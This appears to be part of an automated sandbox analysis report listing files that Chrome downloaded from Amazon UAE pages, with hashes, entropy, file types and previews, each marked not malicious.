                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild
                                                                                                                                                                                                        Preview:(function(V){var f=window.AmazonUIPageJS||window.P,M=f._namespace||f.attributeErrors,a=M?M("CardJsRuntimeBuzzCopyBuild",""):f;a.guardFatal?a.guardFatal(V)(a,window):a.execute(function(){V(a,window)})})(function(V,f,M){mix_d("@c/api-lock",["exports"],function(a){var c={},d=function(a){delete c[a.type]};a["default"]={isLockedFor:function(a){return!a.every(function(a){return!!c[a]})},unlockForEvent:function(a,b){c[a.type]=a;try{var e=b();if(e instanceof Promise)return e.finally?e.finally(function(){return d(a)}):.e.then(function(){return d(a)},function(b){d(a);throw b;});d(a)}catch(k){throw d(a),k;}return Promise.resolve()},unlockForEventOnce:function(a){c[a.type]=a},resetLocks:function(){Object.keys(c).forEach(function(a){return d(c[a])})}};a.initialize=function(a,b,c){};Object.defineProperty(a,"__esModule",{value:!0})});mix_d("@c/aui-untrusted-ajax",["exports","tslib","@p/a-ajax","@c/guard"],function(a,c,d,e){function b(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}fun
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11115), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11115
                                                                                                                                                                                                        Entropy (8bit):5.337650855535322
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:1pbJWreb26qpOaby4gajwJeY1WOO5wKZBBOlIY44Bqb/tS:Mreb2thY5STJbQ
                                                                                                                                                                                                        MD5:BF4E1F374BB39E19D3D0E4FDEC6B1262
                                                                                                                                                                                                        SHA1:033CBD9D3A22FEA4F68382D2EA288F02AE49D44C
                                                                                                                                                                                                        SHA-256:9ECC35EB2B04506198971EA8AE65DAAABB0E722A6BBC0950719B19B69FD4B043
                                                                                                                                                                                                        SHA-512:C148107964C11BD6AFAB3D585EB4C60B7CC813F6B53B36CDA251E8BA086FA613220E70EF471D0204DB128C8478C00DDDA22655D28EDF79A45A06931B8B2EA0AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/31N-r+VYSWL.js
                                                                                                                                                                                                        Preview:var DACXImageTemplateCreative=function(e){var n={};function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.r=function(e){Object.defineProperty(e,"__esModule",{value:!0})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=15)}([function(e,n,t){"use strict";var r="undefined"!=typeof MSFClient&&MSFClient;n.a=r},function(e,n,t){"use strict";t.r(n),t.d(n,"readStringFromCookie",function(){return u}),t.d(n,"writeString",function(){return i}),t.d(n,"readString",function(){return a}),t.d(n,"write",function(){return c}),t.d(n,"read",function(){return f}),t.d(n,"isSupported",function(){return l});var r=864e5,o=365;function u(e,n){var t=function(e){if("string"!=typeo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2163
                                                                                                                                                                                                        Entropy (8bit):7.678609836585432
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r63aGXsbbbbbbbbbbbJku/ckKy2zd5En7Csuj1Z/tiKEejbqQwrEB4:TTXsbbbbbbbbbbbJkZkKbzjfBLvEejbS
                                                                                                                                                                                                        MD5:1F26A83CA8A75E57A2C2E521D6DC770C
                                                                                                                                                                                                        SHA1:ECA1486B82EBE5779C2DC127FE99BD274280A264
                                                                                                                                                                                                        SHA-256:168F880DE6150966D924704B99257AF2A7A073BD5A940EA26C5152DDCD532628
                                                                                                                                                                                                        SHA-512:6F467919536B5669D02BF712E421AB48D5F3753F4BAC84B7AAEAFCB1E0BE10A188989115565F8164C5586AB06386DFB5B0D2CE031F6DD83371266B113F6AC82C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE._SY116_CB558609315_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1a"2AQRq...#.34B....Cr.....................................................!ABQ............?..8..q......................................................................x.X....K.V#.F.......N.J..w....Z.+=L._..%..[Tf..../m.i...2....A1t...%weug.72..k\w...!...s..]om$......V}k.j.Z.'(.^..zh.....[-....?....Ev.+.*1!\..vb.`...=.eq..i:UznN&.U.y.!..+.28..l...bj.k.q.Y,m.j.6*.8Y...*1...W......A......*..K..6J.....>x6...{=......f..N..E...O.....d....L.r..P[.j^..V-..Rd3I..9I.}..?1.*>%..r...4r.....vPQi8.w..l@.2...=.....~{t.p....O.V..6...........d.<-7 .#.l.[..Q..|....C5...'.o... ..1+N.......8.%w.:#.y[.i.EAw?.m.\.k2^..................-.]..[.R.-obWo)..U.1.E....#wivVH"Z...H.p.2.....~.,....EV-. .EA'.+oq~?&fz.[..5-SF..9...}.|.c!Q..[b..8.J}kO......z.ud[I?.(.m7G..._3
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4238
                                                                                                                                                                                                        Entropy (8bit):7.704720238700568
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R9+0YkxK07wxusjK47D0fo6LBySHzUUcdVCDbjux+z:e0wFz6LByhUC+nuk
                                                                                                                                                                                                        MD5:E085596AD1756B346493432818245583
                                                                                                                                                                                                        SHA1:499B90D2BCF4AF80F68AEEEE3A63044410AE70E1
                                                                                                                                                                                                        SHA-256:7ED66F86F3E12C85F976D5FEE535B26EF0EB45BCA3E6D32D985E44FC2E42FE20
                                                                                                                                                                                                        SHA-512:0396935B35D79CEDAE2164C64BED24A9E7118DB548C171B41D8E1AB8522F66B68543F1C8F1690432ED0B3C8324FAB752B0D5A69A2535EEAA8FF9BF29294FE7A9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_21_BTS24_AE_GW_QC-CROSSA_DQC_CL_BeautyAppliances_186x116_EN._SY116_CB566993070_.jpg
                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6C265640478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6C26563F478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="7432AE9D7C846B33C16FC475697925A7" stRef:documentID="7432AE9D7C846B33C16FC475697925A7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d...................b....................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?ul&v=0.295223.0&id=1GXSAVZ7MBDVTNT0VYNB&m=1&sc=1GXSAVZ7MBDVTNT0VYNB&ue=7&bb=1101&ns=1276&ne=1393&cf=1395&af=2238&fn=2238&be=2706&fp=1311&fcp=1311&pc=7915&tc=-1341&na_=-1341&ul_=-1723729085060&_ul=-1723729085060&rd_=-1723729085060&_rd=-1723729085060&fe_=-1337&lk_=-1227&_lk=-1227&co_=-1227&_co=-411&sc_=-1212&rq_=-386&rs_=-56&_rs=502&dl_=-45&di_=2770&de_=2770&_de=2770&_dc=-1723729085060&ld_=-1723729085060&_ld=-1723729085060&ntd=0&ty=0&rc=0&hob=5&hoe=8&ul=7915&t=1723729092975&ctb=1&rt=cf:22-1-3-18-2-8-0_af:34-1-3-30-2-8-0_&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-09|mutObsYes|navbar|gwCFImgCache|aui:sw:page_proxy:no_ctrl|adrender:68722d84-42e5-4770-9bd0-3ace4c1af9cc|adrender:Gateway:right-2:desktop|adrender:lightad:68722d84-42e5-4770-9bd0-3ace4c1af9cc|adrender:lightad:Gateway:right-2:desktop|adrender:68722d84-42e5-4770-9bd0-3ace4c1af9cc:creativeid:579371395698106697|adrender:Gateway:right-2:desktop:creativeid:579371395698106697|adrender:68722d84-42e5-4770-9bd0-3ace4c1af9cc:programid:1001|adrender:Gateway:right-2:desktop:programid:1001|adrender:68722d84-42e5-4770-9bd0-3ace4c1af9cc:creativetemplatename:image|adrender:Gateway:right-2:desktop:creativetemplatename:image|FWCIMEnabled|fls-eu-amazon-ae|adblk_no|perfYes|ak_cdn_fr|ak_cdn_mp|mutObsActive|csm-feature-touch-enabled:false|browserQuiteFn&viz=visible:7&pty=Gateway&spty=desktop&pti=desktop&tid=1GXSAVZ7MBDVTNT0VYNB&aftb=1&ui=2&lob=1
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 171x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10570
                                                                                                                                                                                                        Entropy (8bit):7.961545667809982
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:TmTNafu4r6xNS1ngU0Wfsr3d6/d2WPJZXx+2kXlhOl12OgobmlNr:6Tgn6HSftuNOsUVkKlAOJbYF
                                                                                                                                                                                                        MD5:2500F63A19DA721A1F6A97C110642CC0
                                                                                                                                                                                                        SHA1:1E250F03A798FB73EBF182A0E92A010BA572CCF1
                                                                                                                                                                                                        SHA-256:1A7790F479695CA7BB532CB3A98DB0724D459CA02D4F6A4518A1CB60D30B1E44
                                                                                                                                                                                                        SHA-512:C9864C1D7D898CBE53A872C7C44783A3431C25B1DE55EEB0572F11C79B64FCD50302ACD6026871F18ECE8C09A4D2125425522FD532736CCCA7B148098F98A19B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!.1"2AQq....46rs....#3RTa.......5BCUu....$DSbe....dt..................................................!1..ARa.Qq.2"...3B.#..............?........:....Ems4QC...*B..Wn.j.m..h.^:...g.....K.m.j....u.../ .d..A..T.3...../.\2..._........|...s..7.J...........eh..7......7...W.nu.uy.P.|...K ..r...\#o..W...z...>.y:....S..>.....?.I.i.;J..3..L.t.....7..sZ..w.p...em;N..i..w.....,9L...>Mev%VC..nM.MwZ..8.\.6v.| .\o.s:...3......z...qq...[3}...\.K..).r.r.n.....G.~*....{....D...6...q.;..8..y.g.iZ...%..0..~i..7W.RUw...........k..u?....<B9.w...?..k..........k........N.lY...y...Z.../.K.y...Z.../.Mz..{.7.Xi...P..$....I ...?..0..u\JGT.........DU[.y...Z.../.K.y...Z.../.E..=......J/l..P.$_.<......)g...?..?K....g.]j.9..=.K....dbX.....<.Z.Uc=..J ...&o..7E...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D3545%26pc%3D11439%26at%3D11439%26t%3D1723729105953%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:11439
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1493)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1567
                                                                                                                                                                                                        Entropy (8bit):5.297390366078816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:jhsvTFlXa3MBTx4HjFt4q/fZMM7Mu+SQD:Vo5aPjb/3j+hD
                                                                                                                                                                                                        MD5:1C5038600EED077C89FD6F9ADE5AF844
                                                                                                                                                                                                        SHA1:E95B9E29276248780E513A4851932A40955BAF2A
                                                                                                                                                                                                        SHA-256:73B668D63458F1801E0EC049EAB30C8B88C76E318D5C70785DDA53D916D90AAC
                                                                                                                                                                                                        SHA-512:4089AF7150108CDEA4467EF083B84CFCEC98F7BFC6A744288F911A640CBC45F0AD67703E58627AFE8B14CC55DF76699EB7748DD6E7CF3533A2942150DDAF0228
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(()=>{"use strict";var e,r={},t={};function o(e){var n=t[e];if(void 0!==n)return n.exports;var i=t[e]={id:e,loaded:!1,exports:{}};return r[e].call(i.exports,i,i.exports,o),i.loaded=!0,i.exports}o.m=r,e=[],o.O=(r,t,n,i)=>{if(!t){var l=1/0;for(u=0;u<e.length;u++){for(var[t,n,i]=e[u],a=!0,d=0;d<t.length;d++)(!1&i||l>=i)&&Object.keys(o.O).every((e=>o.O[e](t[d])))?t.splice(d--,1):(a=!1,i<l&&(l=i));if(a){e.splice(u--,1);var s=n();void 0!==s&&(r=s)}}return r}i=i||0;for(var u=e.length;u>0&&e[u-1][2]>i;u--)e[u]=e[u-1];e[u]=[t,n,i]},o.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return o.d(r,{a:r}),r},o.d=(e,r)=>{for(var t in r)o.o(r,t)&&!o.o(e,t)&&Object.defineProperty(e,t,{enumerable:!0,get:r[t]})},o.g=function(){if("object"===typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"===typeof window)return window}}(),o.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),o.r=e=>{"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.definePropert
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3477
                                                                                                                                                                                                        Entropy (8bit):7.885044534481532
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TglJ0DfwwyPOdnE9S6DfZST+UlBoyRuZBdAP:UlJ2fDyMnE0+UlBoWks
                                                                                                                                                                                                        MD5:6D7EC8534AB8E120F415AEBA97D0F32A
                                                                                                                                                                                                        SHA1:A565BF0CFB587F1D421DB225C99F2A8B754C8665
                                                                                                                                                                                                        SHA-256:C736D03F11B28FFBF91A25BF75D4A6368A81032CD8E7D79ED821DDFBF3CA4701
                                                                                                                                                                                                        SHA-512:5E9BB42EF52190C792DC29952B627BA586E9E4AB1DDAC1DDB771810068AEF9616206207A71EFDAFAE8F600C7B6A6834837F5BA4FFE34C4B31CC5A5F9705BBE90
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................1.!.."AQ..aq.....#2.....ST...3Rtu...%5BCb....................................................1....!R..2q..."#AQSB..$3a..............?....(.JR...(.JR...(.JR...(.JR...(...\...U..0.....*..JL.3]....Y..!...q.....*.T.X.am....g..&`..1v....?....K....U.8B.1]>....|{Q..T..ia?.......0}.;.......N....}?.....C...}....K.......Q.N.8Z...q..j...>.~...W.:.....u{..Q_8t.h...>.. .Z...=..4..c....Q..^KT.hz.....W.=m`.n=....w..s...<#N....y?Cu]......u..y........\..^xT.h:....u....I........Z...m.g..m%2..+...Q.Di.].w..R&..T.w...**.T..;.+.w......?~...Z..a.(.!.r.L..2..pdX.~...!If..F.u_Z .R...\...TG..3.6.b.B_m....q0B..#.~..O.V:.)K.m.\Y+X.O....H.;..X....n".*.-.....B..=...R. ..!$(....WC....J.....q..]..5o.p......Ci......kT..a....N.1...g.=..<..2V....6D)H#[
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):29858
                                                                                                                                                                                                        Entropy (8bit):5.406876442951382
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:6d3+dIq67FP9E3vFYwFToRr4TXBwgvBpqu4v5IPg4Ye+/jfrY6bV6akWvBir0/VG:6JOFGP9EfbTopAPALrqaBFb41QKk0
                                                                                                                                                                                                        MD5:9EC67B542446FAF71DD6BF699AFD97F7
                                                                                                                                                                                                        SHA1:361B41550C9B3CAA6E59E13001A937F066274558
                                                                                                                                                                                                        SHA-256:D0BC51B3A64D9377A8239E6A9C98CCCF8FB2F64B76F9CF7A50BC4A1B329D643D
                                                                                                                                                                                                        SHA-512:36FC7FC1C651E4D9FA3FC1B19EC8841DBA584013F8B8B6EC4EFDE2DA431E42716E3161B902A81A7031572E811A280B073B2CB428DC4EF69A7C32E509024AA6BD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/hz/rhf?currentPageType=i18n-preferences-web&currentSubPageType=subSelectPreferences&excludeAsin=&fieldKeywords=&k=&keywords=&search=&auditEnabled=&previewCampaigns=&forceWidgets=&searchAlias=&cardJSPresent=true
                                                                                                                                                                                                        Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-I5Nja content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-J7216V7KNZNMGZR71FM8 pd_rd_wg-lTxCU pd_rd_r-e77fb6f6-5f62-4474-8da1-7b64a8242398 c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstancet96gYorJtu9B7bJLnSzjGg\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5083
                                                                                                                                                                                                        Entropy (8bit):7.800803247208265
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T7Xoz5g6xQ2UPchdqmpeQ0fEv3474UFGLFQVONp1lzEfXNZN9Guvm:fY93x8PchdrmE3474UFGxQVONdzE/N7O
                                                                                                                                                                                                        MD5:65783A2CFDEA8CEA95C13F48B7F7E4C6
                                                                                                                                                                                                        SHA1:BD90073C177C8576513E535E2CD424E4DF6669F4
                                                                                                                                                                                                        SHA-256:E8E33A37BA7388137E969043718C399C331859ACC5308678AAD6F21D9FD1E216
                                                                                                                                                                                                        SHA-512:6ED81332E0FA918ED02DEB07AD9CED5A8985D05342FD8760526BF95A7C9AD37FAA588B9609C552CCDBB723527009100AB09B77CF3A03655824CB47743FAFA462
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31vRRFcgseL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`....'sVS.6.i .........-...[.e..si].#<...@..............R,...^y...o:5l.........J.l..<..............O,J.`.........R.J.|O,.8....}~.:..^g[..n.O*.)8v.H.......F=^#4.....-.c.[.v.......ca....H....r.....+ ......u._~.k...O.......0..?`..........9.s[d.+...8.P........i.Y.:).0.c...},.As......'...?.%.\..$......^4...zV*.,.Ov]?W?..K...M.Zi..e.iB.............GkE.OnS.(....x.u.O.....p..D+x..;...T.......86.....%>..c^wd.[V.Ln~9...m...c.O.I..ziW..._OAN\f.N.....&....4..."T..}....f..b..]...i.V.k.{=........cmN......\ .....tw.+._.z.R.K.b.&S..SzLV..w....................0............................!"123@.#0A.4B. CP`.............9..R.7.j,.i;.;?{|...nec!$.'.5PV..3.1.0......y\......A.vdo....}...3S<.....<.D...P....3H].dc..3eG...+j..(<3......P.k..o
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 207x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8590
                                                                                                                                                                                                        Entropy (8bit):7.946247791594697
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:QyJbJBj/cfgB+35ltDGIe+jlzKmYAIUHRUTgdN4TTE3moaYvYIhG:3bj/cfgcT1he+jUmYAiTgdNUE2LYwIhG
                                                                                                                                                                                                        MD5:F832B2305F9F78038CB08623B334A53D
                                                                                                                                                                                                        SHA1:85556AA4C3FCE3403C747467195A2CA1A013DA8D
                                                                                                                                                                                                        SHA-256:644A30E692D729B374E40A2464FB3976E0BD2D049DAA7005E98E3CDB14C97D8E
                                                                                                                                                                                                        SHA-512:93633FB1E672B9259D435A917B93135DB79DE2B546F43E687736ED183A85723E98683B40C3CD96F8E742CE997A5EF32EB025D92CF63409D227B21E41AFE1B4A4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQ.."23aq.6Rrst.....5B...#4CS...%Db..$......................................................1.!2AQq."C..#$34Babr........5R..............?..tQE..QE..QE..T[^..F.$0..q..K....O......=.b..+....L..UI.&[.U.s.DY.......T~..oQ`...-U..Wx.:....m...s../.X#.!j`..win9..}..j/S..q.|..R.p.nP...8..s.....'>...X.)..'..H..JFo......7.....Z..%s.:u....=...I{;k..0.....n.......K....ik6..M.7.).O...z...".V..Y....m......4.....F..sT~..................T=..m...M.I?)..B?.j.\...W>../.p........ln.....S.r4'B.[._k/gwt..$.1Y[..!\.&..c..Q..g...=.&..8N.cWV.(....aE.S..QE..QE..QE...6.k..$..>3Q..m...k.>3Q..n^l.......B.(....Q@.M.[.._i.......e.E..l.....~..2.X..F.5.@.D.(......Z...ST..9r9M_...x....So.E+....ElV.if...V.B}.....'...SE..o..$....iz)..S[lsU..T.n.kl...M..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4953
                                                                                                                                                                                                        Entropy (8bit):7.808623190624863
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tm24/lgJMTP/XUW8w6LMd4FtyKtgu67UEE8qDWfjwMwqUyULaL5rZC7QG314Lan:qdgmT3KOCFp2BIX26LaL5NeQG314Lan
                                                                                                                                                                                                        MD5:36DC28BC6344043974296566C2E5019C
                                                                                                                                                                                                        SHA1:862F994728472A39BF99D76544A4BF946F1264DA
                                                                                                                                                                                                        SHA-256:079004AD284CC3B814896907F57E873D486101DBE4285F74C7067BDF9B6935BB
                                                                                                                                                                                                        SHA-512:354E0BBEF69C79F08D234360CF6323CC0A3EBE9F8A635899EC670C8D918491D1A11720F025F93F821246F7A9F352B9BF8E9DADAA4344C576668B2D6D8C709B0B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................................................7.9.8...U.:...sc,o.........a.!...c.la..... ............<..}I.TyP-..g......B.T).H..U.@....'.>.y.-g.'O....J.Yy.L;.7....FC...gd..u...9...$.C.^.D.P.g|Lb...M)S..-. .O.([..Kj.2t%9.....K..%.....-..GnS6...C.&...|;..;.;.;...6... w.a...\..._V.{.C.K....8w..p{$...N.......[\.9n...n<..:/`.}.6._.'\f.t]...c.....#.v'..6....7nY.}"c.....j...O.k.:.".&^e...u....$....5...eg....$...t{....:x...~.'w..c....1?...8oW...9.[.6..Jn........;_4. ".......Z{z..O..Q.............|}TR....T...............................0..........................1.!23. 4@.."#0A$p.BQ............30o..Mxv..s.)!..I...-........9...kQ.2...c..h;|.!A.......n....M.97a.f..&......u..o...k7Y.!.rf....X@."..o%]=.+_.A.#.zG...6EYH......._.P.Z.....u....tqI)y\B9.>s.Dd
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
